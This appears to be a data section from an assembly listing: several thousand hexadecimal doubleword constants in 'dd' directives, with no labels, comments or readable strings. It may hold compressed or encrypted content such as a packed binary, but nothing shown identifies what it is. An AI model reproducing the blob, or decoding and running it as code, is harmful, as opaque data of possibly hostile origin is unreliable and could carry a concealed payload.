dd 1D85280Dh, 190BEBF0h, 86027306h, 3B04C6BDh, 4E72B05Ah
dd 4EB8A6EFh, 250F3909h, 26BB11F9h, 0D1464025h, 0EB720C08h
dd 5645F424h, 0CEF009AEh, 0FCA72122h, 5701940Fh, 0B931021h
dd 58AC6ACFh, 0D04AA150h, 43BD3E0h, 89DA74C6h, 0D152BF01h
dd 8837BA10h, 0F27091C6h, 39281E5Ch, 74063835h, 0DC0D8BDBh
dd 82859811h, 0BCDE413Ch, 1A144D63h, 0E8090868h, 0B6C43322h
dd 0E0AC0BFEh, 8C401482h, 68803264h, 0EA119240h, 0D70BDF24h
dd 0B895E536h, 54759648h, 0B6B33CC3h, 31E93125h, 151CBE42h
dd 20BF7006h, 0C73B040Fh, 9A0F7359h, 4BF72E00h, 49E8D237h
dd 1B742701h, 0E80A4068h, 6BA432B7h, 71950C4Fh, 1604E9A5h
dd 58C39309h, 83F0583Fh, 15186B84h, 2F312152h, 30FC98C9h
dd 390A433Bh, 0C214101Dh, 32BC7E9Fh, 608A110Ch, 0C408A21Ah
dd 0C27D3911h, 0D7415B52h, 0AD5641B4h, 0D696041Eh, 22B0421Ch
dd 4D06929Fh, 4A60C8F0h, 832674E4h, 1704EE33h, 72B3F73Bh
dd 1D3EDB1Bh, 4C8BF090h, 3B4773E8h, 0E53DDA98h, 2D722857h
dd 0DAEBB080h, 0C450682Ah, 0EC44B829h, 5FE3208h, 8586859h
dd 22445410h, 21E6CA24h, 1410901Fh, 0D2988928h, 290B0022h
dd 0D229F4AFh, 0A0B1E0A8h, 0C8747E1Fh, 2499233h, 0D217DB8Ah
dd 2463E1B1h, 112C0C3Fh, 11146F1Ch, 42B80121h, 0FE24E89Fh
dd 0FFE57F1h, 1DE28972h, 5BBE7D60h, 1075581Dh, 10831A2Eh
dd 8435EF0Ch, 0D922086Ch, 44C90CA5h, 2133B906h, 3D083254h
dd 44DBC18Ah, 79621413h, 0C4A3248Ch, 0B65E6506h, 0B48C710Ah
dd 2484C338h, 0E451A8D2h, 0B85378E2h, 0A3CA9574h, 9AE99282h
dd 4FBE890h, 72573Fh, 85FC7B8Dh, 0BA6E76FFh, 95A49A6Ah
dd 0CD0446C9h, 8057CEC1h, 513A529Dh, 4D7506FCh, 19FD508Ah
dd 0E3DE3C41h, 0FE1822F8h, 0E2DF2641h, 48FF0421h, 24FC3B10h
dd 123C830Bh, 8B1D04h, 3FEBC272h, 4033B60Fh, 0A74908FFh
dd 451546A6h, 3CD2D3FEh, 3D5DFD24h, 0FC453222h, 9328D2D3h
dd 0E0DDC76Eh, 3A148D85h, 409BC011h, 8ED6FF41h, 0EC8C4819h
dd 0C6DDD43Fh, 81E150E1h, 0C12B0906h, 0FA42F2EBh, 4A56D41Eh
dd 1F4817E7h, 0DBC5473h, 0C9691260h, 37043FDh, 0C3C1810Bh
dd 31158D9Eh, 0E8A1027Fh, 46E22510h, 0C15A0774h, 0DB791499h
dd 3412027h, 35166073h, 5793189Ch, 0F883BF01h, 0C46FC6FEh
dd 0CD29FA38h, 7410FD00h, 4E8B000Dh, 33CF0304h, 0E82F380Ch
dd 7945E3BDh, 5246E61Ah, 0AD211008h, 0F6285431h, 0D667C96h
dd 0F8631FE0h, 83150C6Bh, 0B8DFEFDh, 71548D30h, 18083604h
dd 53072078h, 8D5E74FCh, 0A6456DD5h, 2C71486h, 10675CA7h
dd 0F93B03A6h, 0D7E07571h, 384C2CE8h, 0E774815h, 7FAF7C01h
dd 5714A3D9h, 75E87187h, 0B88D6FCDh, 1E979AFEh, 0C8364787h
dd 0F518C526h, 9777560h, 0EB22C2BDh, 2889A0C6h, 5633981h
dd 75E06D73h, 0A88D822Ah, 50217410h, 25E80868h, 7C442F2Ch
dd 4A9FB09Ah, 2794D63Dh, 190B3C62h, 6CC12CD2h, 37E6E82Ch
dd 419E203Ch, 740C6839h, 1F4CD213h, 0C838D572h, 6418D3E8h
dd 5982144Bh, 89C950Ch, 56C4F79Ah, 8AE83A30h, 864B10A1h
dd 7CE9D7A6h, 7B831273h, 84F5040Ch, 31F2D450h, 63BACB52h
dd 39933156h, 15AD15E9h, 8DC400D9h, 782BD292h, 0D0F71D70h
dd 0C48B8723h, 3CF00625h, 72243B7Fh, 590FCA0Ah, 0D301F294h
dd 2DC32404h, 85C24A2Eh, 9AE913E6h, 0E81D0433h, 4D78F761h
dd 0EB840642h, 0CA30E77Fh, 21D92C35h, 3E52270Eh, 4B8D7930h
dd 10954814h, 968E44C9h, 2FA22530h, 883D2225h, 0F77A2005h
dd 8300C81Ah, 0C46C6F1h
dd 633A46B8h, 8F1CB5E8h, 0B30ECA12h, 0A0ECC6Ch, 4921F768h
dd 0D3BC0EFh, 9169F988h, 0F5A4F07Ah, 48851085h, 0E8938070h
dd 51CB3FD4h, 320DE06h, 0CA8053Bh, 3F53B5Bh, 6D58200Ah
dd 48385073h, 72DD204h, 0EA02708Eh, 6C2C37C3h, 0EB4801C7h
dd 0B5083532h, 0F1D6F10h, 13C25EC6h, 82DB4F9h, 41A6CE59h
dd 488D0600h, 288346BFh, 98E219F9h, 1E2067D8h, 0F779F70Ah
dd 23FFF442h, 1BD6FCC1h, 0DAD0EFDAh, 4E65B05Fh, 10CB325Eh
dd 0F04DFF98h, 72F10498h, 86F50EAh, 0F2F82EFEh, 0DE84F547h
dd 0C1383204h, 72474ABh, 2460F6F8h, 634AFD70h, 3D5089E9h
dd 81907DF2h, 2B75FB16h, 0B236A711h, 0EB9B1FA8h, 39F0F0F2h
dd 75140958h, 6349570Dh, 4B29A840h, 5634EB17h, 2511E56h
dd 5051048Ch, 1B932FE8h, 8B203EFFh, 62072464h, 92912A1Dh
dd 0C3921147h, 0D21DF03Ah, 84FB2A2Bh, 614D405Ch, 8942C482h
dd 4E2E56D3h, 1E301C28h, 0BC373075h, 0CA821F54h, 654B73F5h
dd 63976411h, 484C1B8Bh, 65DC2C0Ch, 0B522E913h, 849F7856h
dd 36E34A92h, 0BC9F2CA1h, 81F5B4F0h, 8A565357h, 0C7D56A11h
dd 0D16FC593h, 0F6DD0171h, 0F7EA33DFh, 0ADEC1435h, 0C23A1F02h
dd 38AC17D3h, 6A90D3Eh, 130A100Dh, 2409F375h, 1311C25Fh
dd 0E9F09F13h, 0F8FF7E8Dh, 84020461h, 272874E4h, 75C43A90h
dd 6741F2BEh, 76186D03h, 0C16FF066h, 0EBDF4323h, 6F6460ABh
dd 5DE9C28Ah, 478DF8A8h, 51BFF69h, 613C768h, 141CF504h
dd 5750100h, 135ABEE8h, 12151061h, 2207722Fh, 0C459FD69h
dd 813366C3h, 80401A3Dh, 1B755A4Dh, 133CA133h, 0F83B8FAh
dd 0C1B4550h, 0EA382275h, 840B2618h, 3183173Dh, 760E1574h
dd 1AC933C8h, 17E88839h, 8472097Fh, 0BEE4C38Dh, 10681160h
dd 41AD3BE5h, 0F6484729h, 4704902Dh, 36D85214h, 6E9445BFh
dd 1D8B9C03h, 642B7F10h, 0EDF83DD3h, 9D89470h, 52E8126Ah
dd 0E959126Ah, 8940818Ah, 15188D3Eh, 6ADD4B0Ch, 0E2A2A79h
dd 0E9FC442Ch, 512A9BFh, 1DB110DDh, 0C900435h, 7C0820DCh
dd 0C7E09D8h, 0D74AE781h, 0DC60293Ah, 0FE5E83E0h, 0CF81F107h
dd 65658006h, 0F1C1524Dh, 0D855E012h, 89C20316h, 0F5A30C88h
dd 31DA0BBDh, 41E0150Fh, 11D43D06h, 8679F5E8h, 0C162BC69h
dd 1097B260h, 8FF9FC8Ah, 0B98D1C6Ah, 9EB2F331h, 1122A8FCh
dd 44AB104Ch, 2840FB11h, 0FC529889h, 194350ABh, 0EC1B817Dh
dd 0D48AF588h, 25BF22FCh, 6422A4A3h, 4E0F425Ah, 97153914h
dd 97269BFAh, 622762B4h, 11993F13h, 951ED09h, 0F166E893h
dd 0A3E9A4F6h, 3F15BF24h, 3E931023h, 0BC5D840Ah, 35D825CBh
dd 3EBC001h, 51590A6Ah, 9D1C547Fh, 0EBAEE882h, 83E4AD90h
dd 70E07D2Dh, 9E62C499h, 0BB581DF7h, 0B02EEB0Bh, 0F1EC5819h
dd 0B1095C75h, 5150D40Bh, 0A52AFB85h, 650C200Ch, 0D42E94F5h
dd 117FB230h, 76AB149Ah, 0EB273626h, 0C3FE4113h, 26398B2Bh
dd 1F6523B8h, 0ECC3C3F0h, 350C9A07h, 882D16E9h, 2054A3BDh
dd 48B5C3D1h, 80FD584Fh, 284FEC81h, 0F04FD7CAh, 240A42Fh
dd 880ECD56h, 848DF479h, 809506A0h, 7C5D3F84h, 78759Fh
dd 8C66747Dh, 21D8A095h, 86948D0Eh, 8705D31h, 65016C45h
dd 646D0068h, 858F1A9Ch, 0C7F2F98h, 0F98D8F4Dh, 45980646h
dd 0D894019Ch, 47DC301h, 1F90B528h, 6AFC400Ch, 8A8C3050h
dd 0EE806A41h, 0C0084154h, 0C1734F1h, 0D80CD0E1h, 5A524B97h
dd 0C0420C18h, 26C98CE6h, 41C5F8D4h, 7C7D25D1h, 15203670h
dd 2BD04D46h, 0E5111C2Fh, 0E2956E75h, 4028409h, 299244E5h
dd 36358C68h, 2A508918h, 528B738Ch, 3301D18Dh, 0C2E85ECDh
dd 0C5EC51F0h, 391DACA8h, 1035A96Fh, 0EB33E806h, 3C1D06Ch
dd 90E0FF5Dh, 1E96738Dh, 909CE21Fh, 409209A5h, 5E74576Dh
dd 82DD9508h, 226177F6h, 6A8D81C6h, 30895E16h, 4A7FFB73h
dd 60288DB3h, 314AEB9Ch, 60189009h, 7C880492h, 9DD97C19h
dd 420223A0h, 0C3653A46h, 12C64FB2h, 0C510E874h, 38AE82Eh
dd 8959223Ch, 0EBF19C07h, 792B33C0h, 0E3135380h, 4BA5C1F7h
dd 2F4A94A6h, 24B26BF0h, 16114E52h, 9E5EF75h, 0CA99D7Bh
dd 10E8B07h, 21FEFFBAh, 83D0037Eh, 0C233B08Ch, 0A9480460h
dd 81267161h, 410C2974h, 0BA3275FCh, 24246972h, 139C578Ch
dd 3A400FD6h, 8DCDEB02h, 58D7A641h, 1464F52Bh, 85FD2CFEh
dd 0E4D3FC91h, 2849BF7Fh, 3C830220h, 0E405E4F5h, 8D1E1E7Fh
dd 15E09804h, 68183889h, 309D0FA0h, 18C70483h, 8D2B46E8h
dd 7A0E783Dh, 2413B2B0h, 804BD27Ch, 0D59DE35Fh, 16812A57h
dd 43FF1EBh, 4AD128CFh, 571F12BEh, 9BE03E57h, 7E830E13h
dd 0C3D20104h, 0E898D30Dh, 0FA83F043h, 39D5C26h, 0FE8108C6h
dd 46150783h, 2F2ADC7Ch, 987915Fh, 3752A40h, 20148250h
dd 5235E648h, 3D024ABEh, 8BC534FFh, 0C932D82Bh, 47A5DC3h
dd 31E53822h, 0FFF50BEAh, 0E4AA3047h, 1D12DF96h, 43FB6E5h
dd 310E8340h, 260A0CDCh, 0B8A070E9h, 8D0A469Ch, 3962AD34h
dd 340D41Eh, 6A6EEBC7h, 42785810h, 93F83464h, 0D8E10FB4h
dd 0CE4EA7EEh, 51EB2CE7h, 59E80DC0h, 35EBD217h, 2C756012h
dd 0C40B0934h, 49A21A41h, 188D178Ah, 0D9AFEF73h, 0A6365DA2h
dd 0B1D9654h, 7193E5Dh, 6A095836h, 42820A7Ch, 2AAE660Bh
dd 0D859572Bh, 0D98D5615h, 75EB8297h, 244804F7h, 4AD2B8A8h
dd 11B611E4h, 36507FF0h, 508A30F3h, 0F5684AB0h, 9D2C2E82h
dd 0A32E86F8h, 7589B990h, 6975901h, 35782583h, 8CDA96DDh
dd 98C9C129h, 0BC908DAh, 0AD5A0D89h, 9C05C71Fh, 0B24246AFh
dd 200D5034h, 6B39A0A1h, 31404C9h, 0AA12EBC8h, 502B8B42h
dd 32BD740Ch, 89417247h, 0C1FE30C0h, 78D3EAEEh, 4DD54699h
dd 0ED41C430h, 0D4ED546Ah, 792BFE0Eh, 0FCA001D2h, 0FC0FEFC1h
dd 0C92C69CFh, 8C41F804h, 0A2D4401h, 8BF04D01h, 31F6490Eh
dd 0FC1293C8h, 3361BDBCh, 601C8D53h, 55FE1327h, 5633F475h
dd 0DEF80CFCh, 0C2F63412h, 15AB83Ch, 4FAC174h, 3FD0834Ah
dd 6A033A76h, 4B8B5A0Fh, 8633B8Eh, 20164275h, 0CAF4BB20h
dd 8B190073h, 8DEBD3CAh, 1EB0024Ch, 5C0121EEh, 9FE44B8h
dd 81572375h, 1C6800BBh, 0AEE04A8Dh, 0B89C1B1Ah, 3B215DC4h
dd 1B591206h, 53CAB0CFh, 125BA786h, 6303FECEh, 365A89F4h
dd 0D245512h, 0D1397095h, 0A54C9430h, 5DC77643h, 4AE3B5F8h
dd 18ABF48Dh, 752B918Fh, 0C12586FFh, 0B03604FBh, 4B0C0085h
dd 76DE3B5Eh, 94E98B02h, 9F36F890h, 7783D6DBh, 2FDAF225h
dd 0EBA55E74h, 0E0B41C71h, 0FB1083FCh, 17C0BE20h, 0EED3CB8Bh
dd 21D6F70Ah, 4C83B074h, 0CD750403h, 0EB319520h, 4B8D151Ah
dd 0B42B18E0h, 623734AEh, 460871B0h, 4979B020h, 0C4E8929h
dd 0DFEC13Ch, 0EBFE8A24h, 8E3D8C03h, 16F47D83h, 27DA6AF0h
dd 3766840Fh, 0C8DF00Eh, 5D59CDD1h, 0C5E4A9Bh, 0DDF5D79h
dd 243B6122h, 248A6075h, 4D098815h, 2FC1FE0Fh, 73191846h
dd 7D803F25h, 850E8064h, 1854354Bh, 1909EB36h, 5E990CAAh
dd 0F7A84744h, 49297518h, 57281025h, 0C8645B26h, 0EA33BA21h
dd 0B89984D2h, 20023109h, 67289CAh, 6930443Bh, 8950412h
dd 24F33482h, 0EA6DC4A1h, 29D85832h, 5DA05404h, 0A4343589h
dd 0F1B168ABh, 4E1C1C0h, 0C48030Fh, 53D4E4BBh, 0D6FF5114h
dd 43339120h, 50090A5Ch
dd 8B850F08h, 1D201040h, 0D188A483h, 2D9858DAh, 435248FEh
dd 80F6780Bh, 0A8A2797Bh, 4609740h, 0E712FE55h, 0F20FC7ADh
dd 0BC85365h, 0B6D10C70h, 10146413h, 94B4B7F9h, 977164E5h
dd 21F3EEE5h, 30C82BEEh, 0EC3A113Dh, 14489651h, 295C73C2h
dd 7E4180A9h, 352B57FFh, 762C0B05h, 86D4501h, 4C1C6314h
dd 0C545DB40h, 3D891805h, 0E05BA322h, 58C3C9F0h, 0A934AA1h
dd 2F35350Dh, 0F01660D2h, 31053475h, 34856B10h, 8535BA82h
dd 87285738h, 3BD1403Ch, 86C8C75Eh, 80835978h, 31933690h
dd 61F66BB4h, 6830117Bh, 4574F6C4h, 5ED3D7A6h, 74DFB06Ch
dd 4486AEAh, 0EB20204Bh, 0AC619662h, 49D13815h, 1241301Ah
dd 102B76FAh, 0EB40EE57h, 0D64E839Bh, 8E7B1C84h, 5CA047Eh
dd 7A862763h, 0C6EC2283h, 0A235F5Fh, 0C38D8D51h, 1849127Eh
dd 0DB337268h, 0C0E26298h, 0CE0F434Fh, 69C3E7F9h, 84C4189Bh
dd 0FE928430h, 5AF8451Dh, 608400Ch, 2281B504h, 40F4754Ah
dd 68FB8B83h, 20D0FFD4h, 0C8FA98E7h, 8B238016h, 0F25EA9A7h
dd 8D9D44D7h, 70629770h, 0C0FA3B0Ch, 4C77FCE7h, 2B006243h
dd 0CE9C1CFh, 1003478Dh, 0F8488341h, 0EC88A1FFh, 317F432Dh
dd 890FFC90h, 1C11AE10h, 0CA40C70Fh, 500F0FF0h, 0E8804604h
dd 50D8113h, 75496840h, 8A8B6BCBh, 2AF752C3h, 4F8D8191h
dd 3148890Ch, 86BA04E9h, 4ED1394h, 9E649702h, 1EF25144h
dd 412E26BCh, 0CD43468Ah, 84F730C8h, 1FA9C049h, 75014E88h
dd 4780903h, 914D6133h, 0D2F7EA04h, 1765C421h, 98C7D5E3h
dd 0A98C0CCAh, 0E1057507h, 2BD7FCDAh, 8CE515Dh, 11EAC117h
dd 0B680F5CAh, 583FC4Fh, 3B49F0E6h, 7D22E9F1h, 10241F64h
dd 310F0AB0h, 0F63D558Eh, 95836FC3h, 3130745h, 0A7F33BD9h
dd 64154D8Fh, 0F90EC177h, 8C834904h, 24F8523Fh, 184A0676h
dd 5F8B1159h, 3E79FB0h, 0DC2C5943h, 64111ACBh, 18630F8h
dd 9090DDB9h, 1FC12688h, 2814C183h, 905D9C1Dh, 0B64FF3E0h
dd 989519Dh, 3C7F069Fh, 31E79B4h, 1CE2B91h, 732AEE58h
dd 0A59743E1h, 0F6D25D41h, 0FFC14BE8h, 834F041Dh, 31903F19h
dd 40EBE4FAh, 1CF8F45Fh, 0F210FB40h, 6C40AB5Bh, 4B800C12h
dd 764E72F9h, 3B0D98F3h, 0B857751Eh, 13074442h, 0C817FF89h
dd 847E1C10h, 1096CF46h, 246FB439h, 0A81C208Ah, 394F5DCBh
dd 0B59B84F2h, 0A5402E58h, 85D43985h, 326EA319h, 0E8A04071h
dd 0DC75F5DAh, 46BC24BFh, 22426CFEh, 0E927F82Ah, 3BECF13Ch
dd 0F0F38B0h, 0DD72F8Dh, 0B529C80Ch, 4B44CC4Eh, 33745C6Eh
dd 0C11FAA92h, 83DD04FEh, 3AC63F12h, 2ED38628h, 2A8FF65Eh
dd 1E19B981h, 0A21FA975h, 3B1DA919h, 424D5ACEh, 89CEC8FEh
dd 70140674h, 4D2C0E4Bh, 648864Eh, 0D6A9ED6Dh, 89771270h
dd 0ADCEDB69h, 8A816CBAh, 0E8DCBC03h, 407A710Ch, 760C8D28h
dd 4B7948F1h, 377BD29Ch, 4A919F60h, 5749D665h, 0E7994C06h
dd 57A21816h, 0CE2199ECh, 89EF90BFh, 0CE571939h, 82840F08h
dd 481D169Ah, 4EB25779h, 0C545481Eh, 1891814Eh, 488468FCh
dd 0B884E5DFh, 6AACFBCDh, 5038B8Dh, 55415C92h, 0F0E1CC17h
dd 9C249B9Ch, 9D405393h, 7D575620h, 1FCEEE0Bh, 26EED3FFh
dd 0EB133B6Ah, 97755F0Dh, 697DBCCAh, 0FDA16BA8h, 3DD9F2CCh
dd 532811EBh, 0DC23F6C7h, 0BFEC024h, 830A75D7h, 0DA14C33Eh
dd 3708CEA0h, 0E10EE872h, 441D8B7Fh, 23242E59h, 2CFE3BD9h
dd 1E55EB5Bh, 1655F87Bh, 726C29B1h, 317591F0h, 0E81C09CAh
dd 41F04432h, 0FAA6E815h, 8534D16Ah, 0C425A7DBh, 44094FD0h
dd 0BB40E841h, 404CCC54h, 43EA01EDh, 387DD1B8h, 29E5743Dh
dd 1CB7A51Dh, 66AC203Dh, 14748F70h, 201B8CA9h, 45407CBAh
dd 90A44D23h, 2975CF12h, 938BD7B4h, 0A481237h, 51A8395Bh
dd 941F3F0Eh, 0E8D59197h, 5DEB41B0h, 0F84C6AE7h, 90D64CBCh
dd 0CE236101h, 594D1275h, 206AAB84h, 0C934A05Fh, 0C5854739h
dd 1D544792h, 2B0AC94Fh, 32F1F2E1h, 7E48999Dh, 3B031032h
dd 1840FF7h, 4A8B9113h, 58E0001Ch, 89494E5Ch, 0E7057D8Bh
dd 7F2789CFh, 0A8386F09h, 0EC01E672h, 44885C23h, 0FE0906DFh
dd 3033750Fh, 5F338FFh, 2CEB0B21h, 27213C94h, 0BD4D888Ch
dd 0AF862E14h, 7565C64Ah, 57DF4B0Bh, 31275CE6h, 0D1B2F823h
dd 71627A24h, 0E36F2543h, 0A17F9012h, 29C28D80h, 4A419816h
dd 9B514390h, 9872E50Ch, 42986C5Eh, 237DC40Bh, 33E7A01Fh
dd 9344D79h, 9E3B09EFh, 50FC7EA3h, 54EBA97Ch, 990D2329h
dd 0C409C49Fh, 0BCAB22F1h, 0BE2E2133h, 3709EE85h, 38BCC7D5h
dd 0A890B0Bh, 2611F304h, 773D981Eh, 0D6D158F0h, 64322799h
dd 23BDF4D5h, 3D798D5Ah, 1A893E20h, 62CA1D3Bh, 0EE986FADh
dd 1240A79h, 58CA332Dh, 8D093725h, 0E39A0442h, 66BF34F8h
dd 35FF25FBh, 6C9C056h, 44086C17h, 0E04B2B8Dh, 987FCDA1h
dd 5081FC06h, 0FFF4827Fh, 18D6D2D0h, 0D62882D9h, 8B10E25Fh
dd 7B6256C3h, 50A0B35Ah, 63249C51h, 7B208D56h, 2E599F6h
dd 0E614E8F8h, 74098AF1h, 3F5FD90Dh, 0A2F0BC92h, 0F84663FBh
dd 0B430E250h, 5CA1461Bh, 5E021688h, 96413DE1h, 0CACA7205h
dd 6AB20198h, 0AB25803h, 855C3914h, 3CDFDC3Dh, 4924CE94h
dd 4427AAA8h, 7CA33E11h, 40038CAEh, 7DE825C3h, 0ECF85869h
dd 0FDA488A3h, 14682436h, 0EE8174Eh, 150ACCF4h, 40E6E89Ch
dd 0E418A36Dh, 92CAEB21h, 35AEC3C1h, 38BDF5F2h, 0FD1C0986h
dd 0B0315008h, 72474CE9h, 0F172170Ch, 77F20F0Bh, 5550889Ah
dd 0B85BE884h, 0FAF803B4h, 6C1A9859h, 0A7232531h, 825B098Ah
dd 54D03DFFh, 1832B2EFh, 55FB8122h, 1822264Bh, 2068183Fh
dd 14BBDAD8h, 0BD5388A8h, 55E58060h, 0B7F0DCE8h, 0F68E52CEh
dd 0A5EFAB21h, 0BE0DD2F1h, 13A4999h, 9D05C602h, 0FB12A516h
dd 75563010h, 86E6826h, 2FBA491h, 5C9A6219h, 0BEA10F42h
dd 0E8014150h, 0BC444967h, 0A0404438h, 32593CA4h, 0E21A3876h
dd 3BEE812Fh, 0AB40C603h, 0DB1894B9h, 8B16C6A0h, 0B482C82Bh
dd 3491DD3Bh, 11879414h, 238746F5h, 2EB0D24h, 515F4622h
dd 0A4AB5350h, 1BE13A70h, 34EA8C70h, 240CFD24h, 82422220h
dd 0CEEDEA1h, 20101868h, 0D7D8DE01h, 0A1481083h, 33EBC238h
dd 1589406Ah, 607C924Ch, 74EEFE8Bh, 0FD7E8325h, 0EAA220EAh
dd 84F5465Dh, 36FF0951h, 0AB522FE8h, 55125066h, 5D484456h
dd 24FF589Ah, 3D24E8FFh, 74C37B3Bh, 301B2215h, 1F4777A4h
dd 68162479h, 34E84272h, 0A854A36Ah, 4BA82A67h, 0A3147351h
dd 0FCA49EFAh, 0E8150720h, 513A037Ch, 0E3347E39h, 2E60B1Dh
dd 98A2EE4Bh, 0B47D4CE3h, 798EED92h, 0C181189Eh, 6EB07E9h
dd 0F17A32Ah, 586F0F66h, 0C4104E09h, 4420560Bh, 7F06305Eh
dd 4F6F0907h, 0BF572827h, 6F7D5F22h, 6E0B4062h, 60762250h
dd 37707E23h, 5F296733h, 77457A71h, 8D70D8FFh, 0BB759CB6h
dd 0D06BF28h, 8BA37549h, 42F4A6E9h, 1C1087A3h, 279EF422h
dd 0C341A325h, 0D0C8B299h, 0CA331C96h, 0E183852Bh, 2207190Fh
dd 0FBFAF9F8h, 710BF94h, 0D14A7D07h, 864A910Ch, 0C269B810h
dd 4D897F40h, 74F15F40h, 122B133Ah, 0E80B5356h, 0B463F127h
dd 6ECD1F7Dh, 0A0779A4Ah, 3074A72h, 89D12BD3h, 0D877EC77h
dd 0F0396179h, 0FA6E74BDh, 0A4F343D8h, 53EB53C0h, 4A75CF3Bh
dd 0C161F035h, 0E4961064h
dd 0DF790A8Ah, 334BC39h, 0F23E1C22h, 2BE3450Ch, 0A575C99Fh
dd 62714CC4h, 37221AEBh, 0B35F92D0h, 0A0CA2153h, 19CA827Eh
dd 3009F4E3h, 3B45807Ch, 0CA395A60h, 2B0BA30Ah, 5166277Eh
dd 19A8A310h, 0A4285658h, 0A0152106h, 429C1D08h, 3D109835h
dd 8C668894h, 7C0152Ah, 88B40D21h, 567901Dh, 88256298h
dd 88842D18h, 5228F9Ch, 2A8183B8h, 9008ACAEh, 11B0650Eh
dd 0BC8CF08Dh, 0E08510A0h, 4204FC5Eh, 1BD4F805h, 0A12866EDh
dd 1D54DB1Dh, 38A02822h, 0C0320409h, 1EA9A414h, 8906EBDBh
dd 0F667D885h, 0DC0BA944h, 0C665EC14h, 64BF0A3h, 6BE8016Ah
dd 59785031h, 70313EE1h, 47653C68h, 8471343Bh, 0A12112A9h
dd 47499088h, 3BB8688Dh, 94C97278h, 0B853653Ch, 3B3F5C9Ah
dd 50DB1346h, 0BE80260h, 906292E1h, 5905161Dh, 0EBC7F07Eh
dd 53574212h, 0DFB9B8h, 0F0033C70h, 5E5A3966h, 14462580h
dd 307C008Dh, 57237618h, 0E5C24468h, 76391BE8h, 370EC65Fh
dd 83430604h, 39F028C7h, 4EB3CE3h, 0E78765A5h, 4644945h
dd 0C4CD409Dh, 66FF8307h, 0D6F89750h, 0A1E9499Fh, 0FD234AD3h
dd 501714C9h, 642E9A1Dh, 0C5859D22h, 0EB42F480h, 5C2584B8h
dd 0A7367BD8h, 23043179h, 65E84AE8h, 324FAC92h, 5756354Ch
dd 0A444194h, 0E8F68208h, 0BF097836h, 3C957888h, 0FAB89CEh
dd 1FFCA277h, 0E4FED388h, 34647E6Ch, 0F9F15654h, 2094770Dh
dd 75C64550h, 0C874241Bh, 76B18982h, 0E421689Ah, 42C62358h
dd 16C89676h, 7F2AD094h, 83BCC584h, 0A1A120Dh, 6420C402h
dd 5C15060Eh, 4130D16Bh, 0EC42E90Dh, 54083B4Eh, 40964658h
dd 5ABE4FFBh, 3AEC8784h, 5C46C706h, 7ABE55F8h, 81907E92h
dd 0AC04E82Fh, 462648CFh, 4A75D9DEh, 0E4D1491Dh, 864889D3h
dd 42E59078h, 0FC104016h, 706C1E8Bh, 4CC853C6h, 4B0E4390h
dd 26B80144h, 8A8D0880h, 91896846h, 0E8FA6260h, 5984A5EBh
dd 453EB9A2h, 0AD6C32E4h, 88A10A60h, 1F3E250Eh, 0E8C976FFh
dd 278BDE33h, 6115365h, 0A9325475h, 0DA73C4C3h, 57A58CEBh
dd 82A0C697h, 0C0EB12F9h, 0A1BDE86Bh, 3823D02Ah, 0DA504E2Fh
dd 10EA32E1h, 12412EC9h, 523A6724h, 0C622A56h, 0E8011BCCh
dd 2923FE18h, 0DFEAD245h, 0A2EFFA24h, 68A4628Bh, 4E8301D1h
dd 0F0812F04h, 2C8809EBh, 0EAA4DB81h, 4B64D533h, 99E4E831h
dd 0CFA2832Ah, 6D22B766h, 1828DD34h, 68247E3Eh, 48434E78h
dd 0E43D4BF7h, 84270FA6h, 46B7A2EAh, 6534DE24h, 1C4B1936h
dd 8C28182Ch, 1A233446h, 0C883C11h, 0FE6144C4h, 8C480CDAh
dd 5C12F046h, 89D243Dh, 6A43DF11h, 0EB9EC10Dh, 7E854D22h
dd 2A87A868h, 6C4BB31Ah, 7F0FB58Ch, 307B9181h, 0B2E8575Ah
dd 3F53A584h, 654D52C5h, 3C295813h, 136C7899h, 3D521223h
dd 3B7C4E22h, 31E6F2D7h, 0DB08014h, 3F830C10h, 8BC475E0h
dd 988F205Bh, 12A11E22h, 0AE58445Ah, 557E8989h, 904018BFh
dd 0C3EA4436h, 0C62A0CA3h, 57590C2Ah, 1AF8A322h, 0CE0975D0h
dd 0C091A257h, 0A84A7D5Fh, 68344C44h, 0B90F439Ch, 8900AD6h
dd 1BC4A305h, 84F56689h, 31C80D52h, 86CC0C7Ch, 0C478AEB0h
dd 5878228Bh, 93FEA34Ch, 0C8280719h, 0EB78E609h, 3E09CC55h
dd 582494A4h, 439151A1h, 0A05B17Ah, 93905C7h, 0ECA9633Ah
dd 3C290C1Ah, 2C6B86B2h, 422289F5h, 0B129CCBDh, 272507Eh
dd 42BB2264h, 0A5DE15E8h, 3F1E35F6h, 0ACC460D7h, 0AA312124h
dd 105250E8h, 8C811CCh, 0D0428640h, 3011CC21h, 5FF4845Fh
dd 0EC795F6Dh, 6865634Dh, 51A13887h, 0BB4C8611h, 0C0228391h
dd 0C5487426h, 852C0450h, 53E13491h, 847E0AFBh, 52FC2A21h
dd 619F3670h, 4FB1D5ECh, 285F5E14h, 0D496D6BCh, 71704548h
dd 67736C67h, 80000574h, 0E8682AC1h, 2987096h, 4E21D181h
dd 7BD0FE62h, 0E9340D31h, 913A084Dh, 2B01890Fh, 78047062h
dd 443A9677h, 6671F00Ch, 0C0EF0F0Fh, 0ADF696EBh, 64B19027h
dd 13D60947h, 400A59D4h, 42845008h, 0B9702760h, 473CD04Ah
dd 578210F2h, 2E7B0845h, 3C202469h, 830BA3E2h, 53587FE2h
dd 74CA3B07h, 984A2B12h, 0FCFF738Bh, 0CF606D2Fh, 33E12C4Eh
dd 0E43803E1h, 0F108C22Fh, 43A834E0h, 0AAF3F4CEh, 2EEB3901h
dd 0C783DFF7h, 2EF0B39Ah, 1FC5B21Bh, 0F686717h, 30B1055h
dd 0DED02BC8h, 0E851040Ah, 0D077F27Eh, 0D651B28Fh, 4A4AA8F7h
dd 33EDADF7h, 0E1463645h, 806A82A8h, 0D6ADE863h, 9F524B7h
dd 0C135854h, 2D07E420h, 4CA80140h, 0E8156940h, 22221B92h
dd 60E3EB2Fh, 9801A852h, 0F489E986h, 3284045Eh, 3AA5385h
dd 0FEE083F5h, 46920EFBh, 0EF164D8Ch, 660278C3h, 6901E3A9h
dd 39604921h, 0E82D2C75h, 0C036A3E9h, 0C3F0B220h, 0A4DDE264h
dd 7503400Ch, 1E9EFF0Dh, 4462705Bh, 21938607h, 6166F217h
dd 10870F7h, 26676B57h, 3E06B9CAh, 6098488Dh, 2B18CC0Eh
dd 3B2D49F8h, 7E5D60FBh, 5057281Dh, 34165B3Ah, 0FCC503F4h
dd 0E8344DEBh, 0B65EE120h, 0BD5F79D2h, 0E40CF996h, 0A3FE0A1Bh
dd 80C1EAA8h, 0C06B1F91h, 0F6A0B538h, 95040305h, 0C33A8025h
